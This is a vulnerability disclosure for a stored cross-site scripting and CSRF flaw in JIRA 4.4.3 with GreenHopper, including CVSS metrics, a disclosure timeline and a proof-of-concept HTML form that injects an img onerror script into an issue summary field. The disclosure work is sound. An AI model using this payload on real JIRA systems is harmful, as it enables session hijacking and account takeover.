CVE-2012-1500, JIRA, GreenHopper, Stored XSS, CWE-79, CAPEC-19, Resolved

Persistent (Stored) XSS

JIRA v4.4.3#663-r165197
GreenHopper – Resolvedin Version 5.9.8
CWE-79, CAPEC-19

Published: 9/3/2012

Keywords

Web Application Security, Web, Cross-Site Scripting (XSS), Private Bug Report, JIRA, Atlassian, CWE-79, CAPEC-19, Stored XSS, Cross Site Request Forgery (CSRF), XSS.CX, Vulnerability Rewards Program, Security Content Automation Protocol (SCAP), Virtual Scripted Attacker (VSA)
Reward     1250 Euro paid by XSS.Cx to: Anonymous

Introduction

JIRA (/ˈdʒɪərə/ JEER-ə) is a proprietary issue tracking product, developed by Atlassian, commonly used for bug tracking, issue tracking, and project management. It has been developed since 2002. JIRA is a commercial software product that can be licensed for running on-premises or available as a hosted solution.
GreenHopper – GreenHopper unlocks the power of Agile, whether you’re a seasoned Agile expert or just getting started. Creating user stories, estimating those stories for a sprint backlog, identifying team velocity, visualizing team activity and reporting progress has never been so easy.

Exploit

Our researchers discovered a Stored XSS vulnerability allowing an attacker to inject arbitrary script code into an existing and fully patched JIRA + GreenHopper installations (JIRA=V4.4.3, GreenHopper prior to V5.9.8).
The requirements for a successful attack are minimal:
A user logged into the targeted JIRA issue tracking system needs to be convinced to visit an attacker controlled link.
Once that link has been visited by the unsuspecting victim, an invisible form will perform a POST request and the victim will be redirected to a URL where username, password and login credentials such as cookies can be read and processed by the attacker.
An attacker can obtain access to privileged accounts and get control over the JIRA issue tracker and connected systems. 
Bug Metrics:
CVSS Score               6.5
Exploitability                Metrics
AccessVector            Network
AccessComplexity      Low
Authentication            Single
Impact Metrics
ConfImpact                Partial
IntegImpact                Partial
AvailImpact                Partial
Proof of Concept Exploit Code
// Form to inject payload via CSRF
// Note: No CSRF tokens required
<form action=”http://sandbox.onjira.com/secure/UpdateFieldJson.jspa” method=”post”>
<input type=submit value=”XSS”>
<input name=”colPage” value=”1″>
<input name=”decorator” value=”none”>
<input name=”fieldId” value=”summary”>
<input name=”fieldValue” value=”<img src=x onerror=’alert(domain+/ — /+cookie)’>”>
<input name=”id” value=”20633″>
<input name=”key” value=”TST-3785″>
<input name=”pageType” value=”PlanningBoard”>
<input name=”selectedBoardId” value=”10000″>
<input name=”selectedProjectid” value=”10000″>
<input name=”stepId” value=”10000″>
<input name=”subType” value=”VersionBoard”>
<input name=”type” value=”VB”>
</form>
// URL reflecting the injected data
A video to illustrate the exploitation process, showing:
 * Victim being logged out
 * Victim logging in
 * Affected JIRA view without XSS
 * A form on a different domain submitting to JIRA (no CSRF tokens)
 * Affected view with XSS
Proofed by: 0xFDE3E73A
Reported by: Anonymous
Vendor Notification: March 7, 2012
Resolution: August 22, 2012

XSS.Cx Vulnerability Rewards Program buys and sells exploits executing in wide scale deployment.